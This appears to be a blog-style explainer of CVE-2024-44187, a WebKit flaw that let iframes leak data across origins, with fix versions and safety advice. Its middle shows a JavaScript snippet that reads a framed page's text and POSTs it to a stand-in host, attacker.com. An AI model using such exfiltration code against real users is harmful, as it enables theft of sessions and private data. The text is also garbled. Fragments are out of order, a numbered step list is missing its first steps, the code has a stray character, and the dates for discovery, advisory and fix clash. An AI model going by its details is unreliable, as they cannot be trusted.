CVE-2024-44187 - Cross-Origin iframe Vulnerability in WebKit — How Data Leaked and How It Got Fixed
Web security is all about making sure information stays where it’s supposed to be. One of the most dangerous problems is when a malicious website steals sensitive data from another website. In early 2024, researchers discovered a critical bug in WebKit (the browser engine behind Safari) called CVE-2024-44187. This flaw allowed websites to exfiltrate data cross-origin—in simple terms, let a bad website peek at content from other pages, all because of the way browser iframes were handled.
This long read will break down what CVE-2024-44187 is, how attackers exploited this bug, what the fix looks like, and what you can do to stay safe.
What Was the Problem? (The Cross-Origin Issue with iframes)
Browsers use something called the Same-Origin Policy to make sure scripts from one site can’t access content from another. For example, JavaScript running on evil.com should not be able to look into your logged-in session at bank.com.
But early in 2024, Apple learned that there was a cross-origin bug with <iframe> elements in WebKit—the engine that runs Safari and many apps on iOS, macOS, and other Apple platforms.
iframes let you load one webpage inside another; they’re often used for embedded widgets or advertisements. The bug involved how Safari tracked the "security origin" of iframes. Malicious sites could use this to steal data from other origins.
visionOS: up to version 1
> Fixed in: Safari 18, visionOS 2, watchOS 11, macOS Sequoia 15, iOS 18, iPadOS 18, tvOS 18
evil.com loads an iframe with a page from a target (like your bank).
4. Because of the bug, evil.com can interact with what's inside the iframe—even though it's not supposed to!
Here’s what a simplified attack might look like
<!-- evil.com -->
<iframe id="steal" src="https://private-victim.com/secret-data"></iframe>;
<script>
document.getElementById('steal').onload = function() {
// Attempt to exfiltrate data
try {
var stolen = document.getElementById('steal').contentWindow.document.body.innerText;
fetch('https://attacker.com/stolen';, {
method: 'POST',
body: stolen
});
} catch (err) {
// Normally security error prevents this...
console.error('Blocked by browser - but the bug might bypass this!');
}
};
</script>
In normal browsers, this code triggers a security error. But on vulnerable Safari/WebKit, attackers might steal info from the iframe—including emails, account numbers, or CSRF tokens.
The Patch: How Did Apple Fix It?
Engineers fixed this problem by improving tracking of “security origins” for iframes. In technical speak, a “security origin” is a combination of protocol (http/https), domain, and port that browsers use to sandbox content.
Before the patch, the browser sometimes messed this up and let the page escape these boundaries.
References
- Apple's official advisory
- WebKit Security Advisory (CVE-2024-44187)
Any authenticated session or private info open to theft
If you were browsing on an outdated iPhone or Mac, you were at risk just by visiting a booby-trapped website!
Did This Get Exploited in the Wild?
As of Apple’s advisory in June 2024, there was no public confirmation of active exploitation. But given the seriousness and the simplicity of exploitation, it’s very possible targeted attacks happened before the fix was released.
Don’t ignore browser and OS security updates!
- If you're a developer, don’t assume iframe content is safe—use CSP, sandbox, and other protections.
Malicious websites may steal data *between sites*.
- Update: Safari 18, macOS Sequoia 15, iOS 18, iPadOS 18, tvOS 18, visionOS 2, watchOS 11 or later have fixed the problem.
Further Reading
- Apple Security Releases
- WebKit Security Updates
If you’re worried about your device, check your software updates today and review your security habits!
Timeline
Published on: 09/17/2024 00:15:52 UTC
Last modified on: 09/25/2024 13:25:52 UTC